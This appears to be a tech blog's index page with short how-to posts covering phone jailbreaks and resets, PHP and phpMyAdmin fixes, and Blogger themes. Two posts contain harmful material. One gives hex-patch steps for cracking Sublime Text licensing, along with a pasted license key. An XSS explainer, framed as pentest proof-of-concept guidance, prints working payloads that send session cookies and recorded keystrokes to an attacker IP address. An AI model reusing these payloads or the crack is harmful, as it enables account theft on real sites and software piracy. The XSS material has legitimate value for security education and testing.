latest articles

HOW TO JAILBREAK IPHONE5/IPOD5/IPAD (iOS 7.1.X)


Hey all , today am going to share HOW TO JAILBREAK IPHONE5/IPOD5/IPAD (iOS 7.1.X) 
its just released few hours before !
so just follow the step to doing it !

STEP 1
Download the PanGu Software for Official Site : LINK

STEP 2 
Double click on the setup and you will see the screen like this 
Uncheck the box at the Right Bottom Corner .



STEP 3
Change Your Device date to 2nd June !
Setting >> General >> Time And Date

STEP 4

Click on  JAILBREAK icon and wait then PanGu App icon will come , Just Click on it and wait then Device Will Reboot then again just wait for min then final reboot will be done ! and CYDIA Icon will be installed on your iDevice :)
Read more

HOW TO HARD RESET SAMSUNG GALAXY ACE DUOS


Hey all ,
Today we are going to see How to HOW TO HARD RESET SAMSUNG GALAXY ACE DUOS
its so easy , Just follow the given instructions

SWITCH OFF THE PHONE
PRESS AND HOLD VOLUME UP + HOME BUTTON + POWER/LOCK KEY

Done , now just follow the displayed instructions on the mobile screen

Read more

HOW TO HARD RESET SAMSUNG GALAXY ACE


Hey all ,
Today we are going to see How to HOW TO HARD RESET SAMSUNG GALEXY ACE
its so easy , Just follow the given instructions

SWITCH OFF THE PHONE
PRESS AND HOLD HOME BUTTON + POWER/LOCK 
BUTTON

Done , now just follow the displayed instructions on the mobile screen
Read more

PHP SESSION_START() FAILED NO SPACE LEFT ON DEVICE ERROR


Hey frnd's
Today i am going to share 1 of the my experience in Web Management .
i have many domains , and today i found 1 error on one of my domian .
the error is >> 
Warning: session_start() [function.session-start]: open(/tmp/sess_009d3afca81be6247b5879f26efdb132, O_RDWR) failed: No space left on device (28) in [file path to php script] on line 2.
this error can affect the function of website also this can cause the security issue , because this error display the full path of the server , it called FPD


so for resolving this issue i changed the storage path of sessions .

How to do this ?
i made a new directory named as tmp in my public_html directory .
then i added the following line in my php code .
we can do this by adding this line in our code 
session_save_path('/home/abcd/public_html/tmp');
Note : add this Line before this Line
session_start();
so in this way i am able to resolve this issue .
hope it will help full for you ! 





Read more

HOW TO REGISTER SUBLIME TEXT 2 & 3 FREE


Hey Guyz ,
Today i m going to show to how to register Sublime_Text editor free free .
About Sublime

Sublime Text is a sophisticated text editor for code, markup and prose.
You'll love the slick user interface, extraordinary features and amazing performance.
its very good editor fro Developer's or Programmers .

And Software cost is 70$ from the Official Site 

HOW TO DO IT

Download the Setup form Official site or From Here

OS X (OS X 10.6 or 10.7 is required)
Windows – also available as a portable version
Windows 64 bit – also available as a portable version


For Mac OS X

Open Terminal and enter the following:

1. cd /Applications/Sublime\ Text\ 2.app/Contents/MacOS/
2. edit file ->> “vim Sublime\ Text\ 2″
3. change to hex mode ->> “:$!xxd”
4. find and replace ->> “:%s/5BE509C33B020111/5BE509C32B020111/g”

Now open the sublime and enter the Mentioned licence key , and Done :)


For WINDOWS

After install, open sublime-text.exe with hex editor. Find and replace “33 42″ with “32 42″.
Save and using Mentioned license key to register .


UBUNTU

Follow these to fully and effectively register sublime text 2 in ubuntu

1.Install ghex editor >> in terminalenter sudo apt-get install ghex

2.Go to in installed directory .

3.In terminal enter “sudo ghex sublime_text”

4.In open ghex window,navigate to Edit>Replace.

5.In the find string section enter 33 42

6.In the replace with section enter 32 42

7.save and exit.

8.run sublime text and regiter with the Mentioned license key.

9. Done :)

License Key


—–BEGIN LICENSE—–
Patrick Carey
Unlimited User License
EA7E-18848
4982D83B6313800EBD801600D7E3CC13
F2CD59825E2B4C4A18490C5815DF68D6
A5EFCC8698CFE589E105EA829C5273C0
C5744F0857FAD2169C88620898C3845A
1F4521CFC160EEC7A9B382DE605C2E6D
DE84CD0160666D30AA8A0C5492D90BB2
75DEFB9FD0275389F74A59BB0CA2B4EF
EA91E646C7F2A688276BCF18E971E372
—–END LICENSE—–







Read more

TOP 5 BLOGGER THEME FREE


Hey all ,
Today am going to post top 5 Blogger Templates which is free and useful for newbie bloggers.
Hope u all will like it .

SKILL BLOGGER TEMPLATE




SPICE UP YOUR BLOG TEMPLATE




LABNOL LIKE BLOGGER TEMPLATE




SHOUT ME LOUD LIKE BLOGGER TEMPLATE




MY BLOGGER TRICKS V2 BLOGGER TEMPLATE





Read more

WHAT WE CAN DO WITH XSS


Hey Frnd's .
Today we are going to see what is XSS (CROSS SITE SCRIPTING) and what we can do with XSS .

XSS or Cross-Site Scripting is dangerous and common web application vulnerability and can be categorized under the heading of an injection attack because in XSS a malicious script or syntax is injected into a web server. In simple words, cross-site scripting is an attack in which an attacker injects malicious code into a web application and the server sends this page to the browser (other users) without any validation of content. The common method or way to execute the syntax is via the guest book, contact form, search bar and other forms that allows user to enter some information.
There are mainly three types of cross-site scripting:

1 : STORED
2 : REFLECTED
3 : DOM BASED XSS

WHAT WE CAN DO WITH XSS ?

One of the most common techniques used as proof of concept (POC) for identifying XSS has been the javascript alert box. The premise is this: if an attacker can send javascript code for an alert box into the application and have it executed within the browser, then XSS is present. For example:
The attacker modifies the user parameter to contain the javascript code for an alert box:

http://target.site/welcome.php?user=Danny<script>alert('XSS')</script>

The application then responds to the request with the unfiltered javascript code inserted within the HTML:

<span>Welcome Danny<script>alert('XSS')</script>!</span> 


Which would then result in the following alert box:



The problem with this technique is not about its effectiveness, but rather that it doesn't communicate clearly the source of the issue or the possible business impacts. Consider this: if the client uses the PoC alone for remediation, they may attempt to fix their application by blacklisting both the <script> and alert strings. Does this protect them from XSS? Certainly not. Let's modify the attack to use an <img> tag and a confirm box instead:

http://target.site/welcome.php?user=Danny<img src=x onerror=confirm('XSS')> 

Which would then result in the following confirm box:


Unless the client had decided to retest the application, they would have assumed that the vulnerability had been remediated. The heart of the issue is not the alert box, but rather that the application had trusted user provided data to be processed without sanitization.

Let's look at the business impacts of XSS. Beside prompting for the user's interaction, the alert box itself doesn't pose a risk to the application. Also, based on the functionality and contents of the application being tested, the actual risk of XSS may vary greatly. With that said, there are many different attacks that go beyond the alert box in which the client should be made aware of. Here are few:

SESSION HIJACKING

A PoC could utilize XSS to steal session cookies for authenticated users and send them back to an attacker controlled server. Using our previous example and an attacker controlled server with the IP address of 5.5.5.5, it may look like this:

http://target.site/welcome.php?user=Danny<img src=x onerror=this.src='http://10.215.21.55/?cookie='+document.cookie>

The attacker would then check the logs on his server for the following request with the session cookie value:



RECORDING KEYSTROKES

If the session cookies are protected by the HttpOnly flag, then it would be effective to demonstrate a key-logger attack as the PoC. On a login page, the following javascript would collect each keystroke from the user and send it to the attacker controlled server , just make one js file with this code :

var data = '';
document.onkeypress = function(e) {
   var w = window.event ? event : e;
   var keystroke = w.keyCode ? w.keyCode : w.charCode;
   keystroke = String.fromCharCode(keystroke);
   data = data + keystroke;
}
window.setInterval(function(){
   new Image().src='http://10.215.21.55/?c=' + data; data = '';
}, 1500);

Because this code is larger than what we ideally would want to use in a GET request, the attacker could store the code in a file on his server and reference it using the <script src> attribute:

http://target.site/welcome.php?user=Danny<script src='http://10.215.21.55/keylogger.js'></script>

The attacker would then check the logs on his server and see the user's password sent over multiple requests: ThisIsMyPassword



PAGE REDIRECT

If the application does not support authentication, such as a brochure site, then the PoC could redirect the user to a page of the attacker's choosing. Some examples could be:

1 : Competitor's website
2 : Installation page for a virus or backdoor
3 : Fake login for a popular website 

The POC for this type of attack would look like the following:

http://target.site/welcome.php?user=Danny<script>document.location='http://website.com'</script>

Web technologies will always be growing and changing, and in doing so will introduce new attack vectors along the way. If we are to provide valuable testing and awareness to clients, then we need to be going beyond the alert box. It is up to us to use whichever scenario best matches the application and communicates the business impact that would speak most to the client. The goal is to provide the information in a way which will best equip them to remediate the issue. While at the same time, what you are doing is demonstrating that you have an in-depth knowledge of the vulnerability and value of your service. 

SOURCE : HP.COM
Read more

HOW TO INCREASE phpMyAdmin UPLOAD LIMIT


Hie !
Today i am going to tell about to how to remove upload limitation or increase the upload limit in the phpMyAdmin .
This error was faced by many user's , including myself also , so i thought to write a post about it , so other can easily get the solution of it . 

 


For this we have to Just edit some parameter of php.ini file .
this file location may be different in different server software .

for me i am using XAMPP .

Location of Files 

Window's OS 

/xampp/etc/php.ini

Mac OS

/private/etc/php.ini

Linux OS

/lampp/etc/php.ini


So Just Edit these parameters According to the our Need .

post_max_size
 
upload_max_filesize 

max_input_time
 
max_execution_time
 
memory_limit
 
 
For me i edited like this .
 
post_max_size = 750M 
 
upload_max_filesize = 750M 
 
max_execution_time = 5000
 
max_input_time = 5000
 
memory_limit = 1000M   
 
Hope it will helpful for all .  

Read more